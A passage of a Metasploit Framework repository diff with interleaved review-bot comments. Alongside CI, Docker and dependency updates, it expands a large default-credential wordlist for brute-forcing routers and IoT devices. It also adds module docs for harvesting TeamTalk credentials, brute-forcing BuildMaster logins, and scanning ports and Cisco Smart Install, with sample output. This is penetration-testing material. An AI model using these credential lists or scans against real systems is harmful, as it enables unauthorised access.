diff --git a/.ruby-version b/.ruby-version index 005119baaa..8e8299dcc0 100644 --- a/.ruby-version +++ b/.ruby-version @@ -1 +1 @@ -2.4.1 +2.4.2 diff --git a/.travis.yml b/.travis.yml index 28f0b510f7..ffcbff526b 100644 --- a/.travis.yml +++ b/.travis.yml @@ -12,8 +12,8 @@ addons: language: ruby rvm: - '2.2' - - '2.3.4' - - '2.4.1' + - '2.3.5' + - '2.4.2' env: - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"' @@ -21,9 +21,15 @@ env: matrix: fast_finish: true + +jobs: + # build docker image include: - - rvm: ruby-head - env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build" + - env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build" DOCKER="true" + # we do not need any setup + before_install: skip + install: skip + before_script: skip before_install: - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc" - rake --version @@ -42,7 +48,8 @@ before_script: - git diff --exit-code db/schema.rb script: - echo "${CMD}" - - bash -c "${CMD}" + # we need travis_wait because the Docker build job can take longer than 10 minutes + - if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi notifications: irc: "irc.freenode.org#msfnotify" diff --git a/.yardopts b/.yardopts index b58b0bda2b..75b5ea96e0 100644 --- a/.yardopts +++ b/.yardopts @@ -2,7 +2,7 @@ --exclude samples/ --exclude \.ut\.rb/ --exclude \.ts\.rb/ ---files CONTRIBUTING.md,COPYING,HACKING,LICENSE +--files CONTRIBUTING.md,COPYING,LICENSE app/**/*.rb lib/msf/**/*.rb lib/metasploit/**/*.rb diff --git a/docker/Dockerfile b/Dockerfile similarity index 86% rename from docker/Dockerfile rename to Dockerfile index 8a7d546cb9..1bf0d1c27c 100644 --- a/docker/Dockerfile +++ b/Dockerfile @@ -1,4 +1,4 @@ -FROM ruby:2.4.1-alpine +FROM ruby:2.4.2-alpine MAINTAINER Rapid7 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage" 
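Review bot: In the new `script:` line the Docker branch hands the whole command string to travis_wait as one quoted argument (`travis_wait 40 "${CMD}"`) while the other branch still runs it through `bash -c "${CMD}"`; whether the Docker branch executes at all depends on travis_wait word-splitting its argument internally, and it will never see shell syntax the way the `bash -c` path does. The consistent and unambiguous form is `travis_wait 40 bash -c "${CMD}"`. Separately, the new `jobs.include` entry carries no `rvm:` key, so it presumably builds on whatever Ruby the Travis image defaults to; if the docker-compose invocation cares, that is worth pinning next to the `DOCKER="true"` marker.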
@@ -36,15 +36,12 @@ RUN apk update && \ ncurses-dev \ git \ && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \ + && gem update --system \ && gem install bundler \ && bundle install --system $BUNDLER_ARGS \ && apk del .ruby-builddeps \ && rm -rf /var/cache/apk/* -# fix for robots gem not readable (known bug) -# https://github.com/rapid7/metasploit-framework/issues/6068 -RUN chmod o+r /usr/local/bundle/gems/robots-*/lib/robots.rb - RUN adduser -g msfconsole -D $MSF_USER RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby) diff --git a/Gemfile.lock b/Gemfile.lock index 2fd974048e..89e8f367a7 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.0) + metasploit-framework (4.16.9) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -17,9 +17,9 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.3.1) + metasploit-payloads (= 1.3.9) metasploit_data_models - metasploit_payloads-mettle (= 0.2.0) + metasploit_payloads-mettle (= 0.2.2) msgpack nessus_rest net-ssh @@ -58,7 +58,6 @@ PATH rex-struct2 rex-text rex-zip - robots ruby_smb rubyntlm rubyzip @@ -99,8 +98,8 @@ GEM minitest (~> 5.1) thread_safe (~> 0.3, >= 0.3.4) tzinfo (~> 1.1) - addressable (2.5.1) - public_suffix (~> 2.0, >= 2.0.2) + addressable (2.5.2) + public_suffix (>= 2.0.2, < 4.0) afm (0.2.2) arel (6.0.4) arel-helpers (2.4.0) @@ -108,11 +107,11 @@ GEM backports (3.8.0) bcrypt (3.1.11) bcrypt_pbkdf (1.0.0) - bindata (2.4.0) + bindata (2.4.1) bit-struct (0.16) builder (3.2.3) coderay (1.1.1) - daemons (1.2.4) + coderay (1.1.2) diff-lcs (1.3) dnsruby (1.60.2) docile (1.1.5) @@ -153,7 +152,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.3.1) + metasploit-payloads (1.3.9) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) 
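Review bot: The added `&& gem update --system \` pulls whatever RubyGems release is current at build time, so two builds of this Dockerfile can produce different gem tooling and the image is no longer reproducible from the pinned `ruby:2.4.2-alpine` base alone. Pin it to an explicit release, e.g. `&& gem update --system <version> \`, and bump it deliberately the same way the base image tag is bumped. The neighbouring `gem install bundler` has the same floating-version property but is pre-existing context, not part of this change. Dropping the `chmod o+r` workaround is consistent with `robots` leaving the lockfile below, but the hunk offers nothing else for the permission issue the deleted comment referenced, so a one-line comment noting why the workaround is gone would help the next maintainer.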
@@ -164,18 +163,18 @@ GEM postgres_ext railties (~> 4.2.6) recog (~> 2.0) - metasploit_payloads-mettle (0.2.0) + metasploit_payloads-mettle (0.2.2) method_source (0.8.2) - mini_portile2 (2.2.0) + mini_portile2 (2.3.0) minitest (5.10.3) msgpack (1.1.0) multipart-post (2.0.0) nessus_rest (0.1.6) - net-ssh (4.1.0) - network_interface (0.0.1) - nexpose (6.1.1) - nokogiri (1.8.0) - mini_portile2 (~> 2.2.0) + net-ssh (4.2.0) + network_interface (0.0.2) + nexpose (7.0.1) + nokogiri (1.8.1) + mini_portile2 (~> 2.3.0) octokit (4.7.0) sawyer (~> 0.8.0, >= 0.5.3) openssl-ccm (1.2.1) @@ -196,11 +195,10 @@ GEM activerecord (>= 4.0.0) arel (>= 4.0.1) pg_array_parser (~> 0.0.9) - pry (0.10.4) + pry (0.11.0) coderay (~> 1.1.0) method_source (~> 0.8.1) - slop (~> 3.4) - public_suffix (2.0.5) + public_suffix (3.0.0) rack (1.6.8) rack-protection (1.5.3) rack @@ -219,13 +217,13 @@ GEM activesupport (= 4.2.9) rake (>= 0.8.7) thor (>= 0.18.1, < 2.0) - rake (12.0.0) + rake (12.1.0) rb-readline (0.5.5) rbnacl (4.0.2) ffi rbnacl-libsodium (1.0.13) rbnacl (>= 3.0.1) - recog (2.1.11) + recog (2.1.15) nokogiri redcarpet (3.4.0) rex-arch (0.1.11) @@ -257,7 +255,7 @@ GEM rex-powershell (0.1.72) rex-random_identifier rex-text - rex-random_identifier (0.1.2) + rex-random_identifier (0.1.4) rex-text rex-registry (0.1.3) rex-rop_builder (0.1.3) @@ -275,7 +273,6 @@ GEM rex-zip (0.1.3) rex-text rkelly-remix (0.0.7) - robots (0.10.1) rspec (3.6.0) rspec-core (~> 3.6.0) rspec-expectations (~> 3.6.0) @@ -309,7 +306,7 @@ GEM sawyer (0.8.1) addressable (>= 2.3.5, < 2.6) faraday (~> 0.8, < 1.0) - simplecov (0.15.0) + simplecov (0.15.1) docile (~> 1.1.0) json (>= 1.8, < 3) simplecov-html (~> 0.10.0) diff --git a/HACKING b/HACKING deleted file mode 100644 index 17343a9f03..0000000000 --- a/HACKING +++ /dev/null 
@@ -1,38 +0,0 @@ -HACKING -======= - -(Last updated: 2014-03-04) - -This document almost entirely deprecated by: - -CONTRIBUTING.md - -in the same directory as this file, and to a lesser extent: - -The Metasploit Development Environment -https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment - -Common Coding Mistakes -https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes - -The Ruby Style Guide -https://github.com/bbatsov/ruby-style-guide - -Ruby 1.9: What to Expect -http://slideshow.rubyforge.org/ruby19.html - -You can use the the "./tools/msftidy.rb" script against your new and -changed modules to do some rudimentary checking for various style and -syntax violations. - -Licensing for Your New Content -============================== - -By submitting code contributions to the Metasploit Project it is -assumed that you are offering your code under the Metasploit License -or similar 3-clause BSD-compatible license. MIT and Ruby Licenses -are also fine. We specifically cannot include GPL code. LGPL code -is accepted on a case by case basis for libraries only and is never -accepted for modules. - - diff --git a/data/logos/r7-metasploit.txt b/data/logos/r7-metasploit.txt index bd8ef2f62c..daae920261 100644 --- a/data/logos/r7-metasploit.txt +++ b/data/logos/r7-metasploit.txt @@ -1,7 +1,7 @@ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%% +%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 
diff --git a/data/wordlists/routers_userpass.txt b/data/wordlists/routers_userpass.txt index 4b35db7811..ba1d1a80cb 100644 --- a/data/wordlists/routers_userpass.txt +++ b/data/wordlists/routers_userpass.txt 
@@ -1,70 +1,100 @@ -root +ADMINISTRATOR ADMINISTRATOR +ADMN admn +Admin admin +Administrator +Administrator 3ware +Administrator admin +Administrator changeme +Administrator ganteng +Administrator letmein +Administrator password +Administrator pilou +Administrator smcadmin +Any 12345 +CSG SESAME +Cisco Cisco +D-Link D-Link +DTA TJM +GEN1 gen1 +GEN2 gen2 +GlobalAdmin GlobalAdmin +HTTP HTTP +IntraStack Asante +IntraSwitch Asante +JDE JDE +LUCENT01 UI-PSWD-01 +LUCENT02 UI-PSWD-02 +MDaemon MServer +MICRO RSX +Manager Manager +Manager friend +NAU NAU +NETWORK NETWORK +NICONEX NICONEX +PBX PBX +PFCUser 240653C9467E45 +PRODDTA PRODDTA +PSEAdmin $secure$ +PlcmSpIp PlcmSpIp +Polycom SpIp +RMUser1 password +SYSADM sysadm +Sweex Mysweex +USERID PASSW0RD +User Password +VNC winterm +VTech VTech +ZXDSL ZXDSL +acc acc +adfexc adfexc +adm admin -guest -root root -root password -root 1234 -root 12345 -root 123456 -root 3ep5w2u -root admin -root Admin -root admin_1 -root alpine -root ascend -root attack -root blender -root calvin -root changeme -root Cisco -root cms500 -root davox -root default -root fivranne -root ggdaseuaimhrke -root iDirect -root letacla -root Mau'dib -root pass -root permit -root ROOT500 -root tini -root tslinux -root wyse -ro ro -router router -rwa rwa -rw rw -ubnt ubnt -guest guest -guest User admin 0 admin 0000 admin 1111 +admin 11111111 admin 123 admin 1234 admin 123456 +admin 1234567890 admin 1234admin admin 2222 admin 22222 -admin2 changeme admin 3477 admin 3ascotel +admin 7ujMko0admin +admin 7ujMko0vizxv admin 9999 +admin Admin +admin AitbISP4eCiG +admin Ascend +admin BRIDGE +admin Intel +admin MiniAP +admin NetCache +admin NetICs +admin OCS +admin P@55w0rd! 
+admin PASSWORD +admin Protector +admin SMDR +admin SUPER +admin Symbol +admin TANDBERG +admin _Cisco admin access admin admin -admin Admin -Admin admin +admin admin117.35.97.74 admin admin123 +admin admin1234 +admin administrator admin adminttd admin adslolitec admin adslroot admin adtran -admin AitbISP4eCiG admin articon admin asante admin ascend -admin Ascend admin asd admin atc123 admin atlantis @@ -72,11 +102,9 @@ admin backdoor admin barricade admin barricadei admin bintec -admin BRIDGE admin cableroot admin changeme admin cisco -admin _Cisco admin comcomcom admin conexant admin default 
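Review bot: The added line `admin admin117.35.97.74` looks like a copy/paste artifact rather than a real default credential — the password `admin` appears fused with an IPv4 address, so the pair can never match and only burns a login attempt (and possibly a lockout counter) on every host the list is run against. It should probably be dropped; if the intended entry was `admin admin`, that pair already exists a few lines above in the same hunk. Since this commit re-sorts the list alphabetically, similar merge artefacts are easiest to spot by scanning for second fields that contain dots and digits.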
@@ -84,96 +112,79 @@ admin diamond admin enter admin epicrouter admin extendnet +admin fliradmin admin giraff admin hagpolm1 admin hello admin help admin hp.com -admin Intel admin ironport admin isee -acc acc -adfexc adfexc -adm +admin jvc admin kont2004 admin letmein admin leviton admin linga +admin meinsma +admin michaelangelo admin michelangelo admin microbusiness -admin MiniAP admin motorola admin mu admin my_DEMARC admin netadmin -admin NetCache -admin NetICs admin noway -admin OCS +admin oelinux123 admin operator -admin P@55w0rd! -admin password admin p-assword -admin PASSWORD +admin pass +admin password admin passwort admin pento admin pfsense admin private -admin Protector admin public admin pwp admin radius admin rmnetlm admin root admin secure +admin service admin setup admin sitecom admin smallbusiness admin smcadmin -admin SMDR admin speedxess -admin SUPER admin superuser +admin support admin switch -admin Symbol admin synnet admin sysAdmin admin system -admin TANDBERG +admin tech +admin ubnt admin visual admin w2402 -admin xad$|#12 +admin wbox admin xad$l#12 +admin xad$|#12 admin zoomadsl -system change_on_install -system/manager sys/change_on_install -system password -system sys +admin2 changeme +administrator administrator +administrator changeme +adminstat OCS +adminstrator changeme adminttd adminttd adminuser OCS adminview OCS -adminstat OCS -adminstrator changeme -Administrator 3ware -Administrator admin -administrator administrator -ADMINISTRATOR ADMINISTRATOR -administrator changeme -Administrator changeme -Administrator ganteng -Administrator letmein -Administrator password -Administrator pilou -Administrator smcadmin -ADMN admn +alpine alpine ami -anonymous any@ anonymous Exabyte -Any 12345 +anonymous any@ apc apc at4400 at4400 -bbsd-client changeme2 bbsd-client NULL +bbsd-client changeme2 bciim bciimpw bcim bcimpw bcms bcmspw 
@@ -191,7 +202,6 @@ cellit cellit cgadmin cgadmin cisco cisco cisco -Cisco Cisco citel citel client client cmaker cmaker @@ -201,15 +211,19 @@ craft craft craft craft craftpw craft crftpw -CSG SESAME cusadmin highspeed cust custpw customer customer none dadmin dadmin01 +daemon davox davox debug d.e.b.u.g debug synnet +default +default antslq +default default +default password deskalt password deskman changeme desknorm password @@ -220,41 +234,39 @@ dhs3pms dhs3pms diag danger diag switch disttech 4tas -D-Link D-Link draytek 1234 -DTA TJM e250 e250changeme e500 e500changeme -echo echo echo User +echo echo enable eng engineer enquiry enquirypw field support -GEN1 gen1 -GEN2 gen2 -GlobalAdmin GlobalAdmin +guest +guest 1111 +guest 12345 +guest 123456 +guest User +guest guest +guest xc3511 halt tlah helpdesk OCS hsa hsadb hscroot abc123 -HTTP HTTP hydrasna iclock timely images images inads inads inads indspw init initpw -installer installer install llatsni install secret +installer installer intel intel intermec intermec intermec intermec1QTPS -IntraStack Asante -IntraSwitch Asante jagadmin -JDE JDE kermit kermit l2 l2 l3 l3 @@ -266,8 +278,6 @@ login access login admin login password lp lp -LUCENT01 UI-PSWD-01 -LUCENT02 UI-PSWD-02 m1122 m1122 mac maint maint 
@@ -278,50 +288,41 @@ manage !manage manager admin manager change_on_install manager friend -Manager friend manager manager -Manager Manager manager sys manuf xxyyzz -MDaemon MServer mediator mediator -MICRO RSX +mg3500 merlin mlusr mlusr monitor monitor +mother fucker mtch mtch mtcl mtcl mtcl naadmin naadmin -NAU NAU netangr attack netman netman netman netopia netopia netrangr attack netscreen netscreen -NETWORK NETWORK -NICONEX NICONEX nms nmspw nokai nokai nokia nokia none 0 none admin -operator -operator 1234 -operator $chwarzepumpe -operator operator op op op operator +operator +operator $chwarzepumpe +operator 1234 +operator operator +oracle oracle patrol patrol -PBX PBX -PFCUser 240653C9467E45 piranha piranha piranha q pmd poll tech -Polycom SpIp -PRODDTA PRODDTA -PSEAdmin $secure$ public public public radware radware 
@@ -331,7 +332,89 @@ readonly lucenttech2 readwrite lucenttech1 recovery recovery replicator replicator -RMUser1 password +ro ro +root +root 000000 +root 1111 +root 1234 +root 12345 +root 123456 +root 1234567890 +root 1234qwer +root 123qwe +root 1q2w3e4r5 +root 3ep5w2u +root 54321 +root 666666 +root 7ujMko0admin +root 7ujMko0vizxv +root 888888 +root Admin +root Cisco +root GMB182 +root LSiuY7pOmZG2s +root Mau'dib +root PASSWORD +root ROOT500 +root Serv4EMC +root Zte521 +root abc123 +root admin +root admin1234 +root admin_1 +root ahetzip8 +root alpine +root anko +root antslq +root ascend +root attack +root avtech +root b120root +root bananapi +root blender +root calvin +root changeme +root cms500 +root comcom +root coolphoenix579 +root davox +root default +root dreambox +root fivranne +root ggdaseuaimhrke +root hi3518 +root iDirect +root ikwb +root ikwd +root jauntech +root juantech +root jvbzd +root klv123 +root klv1234 +root letacla +root maxided +root oelinux123 +root openssh +root openvpnas +root orion99 +root pa55w0rd +root pass +root password +root permit +root realtek +root root +root tini +root tslinux +root user +root vizxv +root wyse +root xc3511 +root xmhdipc +root zlxx. +root zte9x15 +router router +rw rw +rwa rwa sa scmadmin scmchangeme scout scout 
@@ -346,44 +429,55 @@ smc smcadmin spcl 0 storwatch specialist stratacom stratauser +su super super 5777364 +super super +super surt +super.super +super.super master superadmin secret superman 21241036 superman talent -super super -super.super -super.super master -super surt superuser superuser 123456 superuser admin supervisor PlsChgMe! supervisor PlsChgMe1 supervisor supervisor +supervisor zyad1234 +support 123 +support 1234 +support 12345 +support 123456 +support admin support h179350 +support login support support support supportpw -su super -Sweex Mysweex +support zlxx. +sys uplink sysadm Admin +sysadm PASS sysadm anicust +sysadm sysadm sysadmin PASS sysadmin password sysadmin sysadmin -sysadm PASS -sysadm sysadm -SYSADM sysadm -sys uplink +system change_on_install +system password +system sys +system/manager sys/change_on_install target password teacher password tech tech ANYCOM -tech field tech ILMI +tech field tech tech telco telco telecom telecom tellabs tellabs#1 +telnet telnet temp1 password test test tiara tiaranet @@ -391,19 +485,17 @@ tiger tiger123 topicalt password topicnorm password topicres password +ubnt ubnt user -USERID PASSW0RD +user 123456 user pass user password -User Password user public user tivonpw user user vcr NetVCR -VNC winterm volition volition vt100 public -VTech VTech webadmin 1234 webadmin webadmin websecadm changeme @@ -412,4 +504,3 @@ wradmin trancell write private xd xd xxx cascade -ZXDSL ZXDSL diff --git a/docker-compose.yml b/docker-compose.yml index e966e8dcac..0f433b31fe 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -4,7 +4,7 @@ services: image: metasploit build: context: . - dockerfile: ./docker/Dockerfile + dockerfile: ./Dockerfile environment: DATABASE_URL: postgres://postgres@db:5432/msf links: diff --git a/documentation/modules/auxiliary/gather/teamtalk_creds.md b/documentation/modules/auxiliary/gather/teamtalk_creds.md new file mode 100644 index 0000000000..9229e4d649 --- /dev/null 
+++ b/documentation/modules/auxiliary/gather/teamtalk_creds.md @@ -0,0 +1,53 @@ +## Description + + This module retrieves user credentials from BearWare TeamTalk. + + Valid administrator credentials are required. + + Starting from version 5, TeamTalk allows users to login using a username and password combination. The username and password are stored on the server in clear text and can be retrieved remotely by any user with administrator privileges. + + +## Vulnerable Application + + [TeamTalk 5](http://www.bearware.dk/) is a freeware conferencing system which allows multiple users to participate in audio and video conversations. The TeamTalk install file includes both client and server application. A special client application is included with accessibility features for visually impaired. + + This module has been tested successfully on TeamTalk versions 5.2.2.4885 and 5.2.3.4893. + + The TeamTalk software is available on the [BearWare website](http://www.bearware.dk/) and on [GitHub](https://github.com/BearWare/TeamTalk5). + + +## Verification Steps + + 1. Start `msfconsole` + 2. Do: `use auxiliary/gather/teamtalk_creds` + 3. Do: `set rhost ` + 4. Do: `set rport ` (default: `10333`) + 5. Do: `set username ` (default: `admin`) + 6. Do: `set password ` (default: `admin`) + 7. Do: `run` + 8. You should get credentials + + +## Scenarios + + ``` + [*] 172.16.191.166:10333 - Found TeamTalk (protocol version 5.2) + [+] 172.16.191.166:10333 - Authenticated successfully + [+] 172.16.191.166:10333 - User is an administrator + [*] 172.16.191.166:10333 - Found 5 users + + TeamTalk User Credentials + ========================= + + Username Password Type + -------- -------- ---- + debbie 1234567890 1 + murphy 934txs 2 + quinn ~!@#$%^&*()_+{}|:" <>?;',./ 2 + sparks password 2 + stormy 1 + + [+] 172.16.191.166:10333 - Credentials saved in: /root/.msf4/loot/20170724092809_default_172.16.191.166_teamtalk.user.cr_034806.txt + [*] Auxiliary module execution completed + ``` + 
diff --git a/documentation/modules/auxiliary/scanner/http/buildmaster_login.md b/documentation/modules/auxiliary/scanner/http/buildmaster_login.md new file mode 100644 index 0000000000..0402f34ef0 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/http/buildmaster_login.md 
@@ -0,0 +1,59 @@ +## Description + +This module allows you to authenticate to Inedo BuildMaster, an application release automation tool. +The default credentials for BuildMaster are Admin/Admin. Gaining privileged access to BuildMaster can lead to remote code execution. + +## Vulnerable Application + +[Inedo's Windows installation guide](http://inedo.com/support/documentation/buildmaster/installation/windows-guide) + +[Inedo website](http://inedo.com/) + +## Verification Steps + +1. Do: ```use auxiliary/scanner/http/buildmaster_login``` +2. Do: ```set RHOSTS [IP]``` +3. Do: ```set RPORT [PORT]``` +4. Do: Set credentials +5. Do: ```run``` +6. You should see the module attempting to log in. + +## Scenarios + +### Attempt to login with the default credentials. + +``` +msf > use auxiliary/scanner/http/buildmaster_login +msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39 +RHOSTS => 10.0.0.39 +msf auxiliary(buildmaster_login) > run + +[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1) +[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin" +[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin" +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(buildmaster_login) > +``` + +### Brute force with credentials from file. 
+ +``` +msf > use auxiliary/scanner/http/buildmaster_login +msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39 +RHOSTS => 10.0.0.39 +msf auxiliary(buildmaster_login) > set USERPASS_FILE ~/BuildMasterCreds.txt +USERPASS_FILE => ~/BuildMasterCreds.txt +msf auxiliary(buildmaster_login) > run + +[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1) +[*] 10.0.0.39:81 - Trying username:"Admin" with password:"test" +[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"test" +[*] 10.0.0.39:81 - Trying username:"Admin" with password:"wrong" +[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"wrong" +[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin" +[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin" +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(buildmaster_login) > +``` diff --git a/documentation/modules/auxiliary/scanner/http/cisco_firepower_login.md b/documentation/modules/auxiliary/scanner/http/cisco_firepower_login.md index 1a0a10b5f6..7a56164b27 100644 --- a/documentation/modules/auxiliary/scanner/http/cisco_firepower_login.md +++ b/documentation/modules/auxiliary/scanner/http/cisco_firepower_login.md @@ -17,7 +17,7 @@ https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=2862 1. Make sure Cisco Firepower Management console's HTTPS service is running 2. Start ```msfconsole``` -3. ```use auxiliary/scanner/http/cisco_firepower_login.rb +3. ```use auxiliary/scanner/http/cisco_firepower_login.rb``` 4. ```set RHOSTS [IP]``` 5. Set credentials 6. ```run``` diff --git a/documentation/modules/auxiliary/scanner/misc/cisco_smart_install.md b/documentation/modules/auxiliary/scanner/misc/cisco_smart_install.md new file mode 100644 index 0000000000..ab67460db7 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/misc/cisco_smart_install.md 
@@ -0,0 +1,30 @@
+## Vulnerable Application
+
+ Any system exposing the Cisco Smart Install (SMI) protocol, which typically runs on TCP port 4786.
+
+## Verification Steps
+
+ 1. Do: ```use auxiliary/scanner/misc/cisco_smart_install```
+ 2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of SMI
+ 3. Do: ```run```
+ 4. If the host is exposing an identifiable SMI instance, it will print the endpoint.
+
+
+## Scenarios
+
+ ```
+msf auxiliary(cisco_smart_install) > run
+
+[*] Scanned 57 of 512 hosts (11% complete)
+[*] Scanned 105 of 512 hosts (20% complete)
+[*] Scanned 157 of 512 hosts (30% complete)
+[*] Scanned 212 of 512 hosts (41% complete)
+[*] Scanned 256 of 512 hosts (50% complete)
+[*] Scanned 310 of 512 hosts (60% complete)
+[*] Scanned 368 of 512 hosts (71% complete)
+[*] Scanned 413 of 512 hosts (80% complete)
+[*] Scanned 466 of 512 hosts (91% complete)
+[+] a.b.c.d:4786 - Fingerprinted the Cisco Smart Install protocol
+[*] Scanned 512 of 512 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
diff --git a/documentation/modules/auxiliary/scanner/portscan/syn.md b/documentation/modules/auxiliary/scanner/portscan/syn.md
new file mode 100644
index 0000000000..751590b95f
--- /dev/null
+++ b/documentation/modules/auxiliary/scanner/portscan/syn.md
@@ -0,0 +1,59 @@ +## Description + +This module will attempt to initiate a TCP/IP connection with ports on the victim machine. It is this done by sending a SYN packet, and if victim replies with a SYN/ACK packet +that means the port is open. Then the attacker sends a RST packet, and as a result the victim's machine assumes that there is a communication error. +The attacker now knows the state of port without a full tcp connection. Major benefit of TCP SYN scan is that most logging applications do not log the TCP/RST by default. + +## Options + + **PORTS** + + This is the list of TCP ports to test on each host. + Formats like `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default + options is to scan `1-10000` ports. + + **TIMEOUT** + + Maximum time to wait for a response. The default value is 500 milliseconds. + + **VERBOSE** + + Gives detailed message about the scan of all the ports. It also shows the + ports that were closed. + +## Verification Steps + + 1. Do: `use auxiliary/scanner/portscan/syn` + 2. Do: `set RHOSTS [IP]` + 3. Do: `set PORTS [PORTS]` + 4. Do: `run` + 5. If any of the TCP ports were open they will be discovered, status will be printed indicating as such. + +## Scenarios + +### Metaspliotable 2 + +``` +msf > use auxiliary/scanner/portscan/syn +msf auxiliary(syn) > set RHOSTS 192.168.45.159 +RHOSTS => 192.168.45.159 +msf auxiliary(syn) > set PORTS 1-10000 +PORTS => 1-10000 +msf auxiliary(syn) > run +[*] TCP OPEN 192.168.45.159:22 +[*] TCP OPEN 192.168.45.159:23 +[*] TCP OPEN 192.168.45.159:111 +[*] TCP OPEN 192.168.45.159:445 +[*] TCP OPEN 192.168.45.159:512 +[*] TCP OPEN 192.168.45.159:513 +[*] TCP OPEN 192.168.45.159:1099 +[*] TCP OPEN 192.168.45.159:2121 +[*] TCP OPEN 192.168.45.159:3306 +[*] TCP OPEN 192.168.45.159:3632 +[*] TCP OPEN 192.168.45.159:6000 +[*] TCP OPEN 192.168.45.159:6697 +[*] TCP OPEN 192.168.45.159:8009 +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed + +``` 
diff --git a/documentation/modules/auxiliary/scanner/portscan/tcp.md b/documentation/modules/auxiliary/scanner/portscan/tcp.md new file mode 100644 index 0000000000..61eea3ec25 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/portscan/tcp.md 
@@ -0,0 +1,71 @@ +## Description + + This module will enumerate open TCP services by performing a full TCP connect on each port. This will establish a complete three-way handshake (SYN -> SYN/ACK -> ACK) on the target port. This does not need administrative privileges on the source machine, which may be useful if pivoting. + +## Vulnerable Application + + Any reachable TCP endpoint is a potential target. + +## Options + + **PORTS** + + This is the list of ports to test for TCP Scan on each host. + Formats like `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default + options is to scan `1-10000` ports. + + **ConnectTimeout** + + This options states the maximum number of seconds to establish a tcp + connection. Default value if `10`. + + **VERBOSE** + + Gives detailed message about the scan of all the ports. It also shows the + ports that were closed. + +## Verification Steps + + 1. Do: ```use auxiliary/scanner/portscan/tcp``` + 2. Do: ```set RHOSTS [IP]``` + 3. Do: ```set PORTS [PORTS]``` + 4. 
Do: ```run``` + +## Scenarios + +### Metaspliotable 2 + +``` +msf > use auxiliary/scanner/portscan/tcp +msf auxiliary(tcp) > set RHOSTS 192.168.45.159 +msf auxiliary(tcp) > set PORTS 1-10000 +msf auxiliary(tcp) > run +[*] 192.168.45.159: - 192.168.45.159:25 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:21 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:23 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:22 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:53 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:80 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:111 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:139 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:445 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:513 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:514 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:512 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:1099 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:1524 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:2049 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:2121 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:3306 - TCP OPEN +[*] 192.168.45.159: 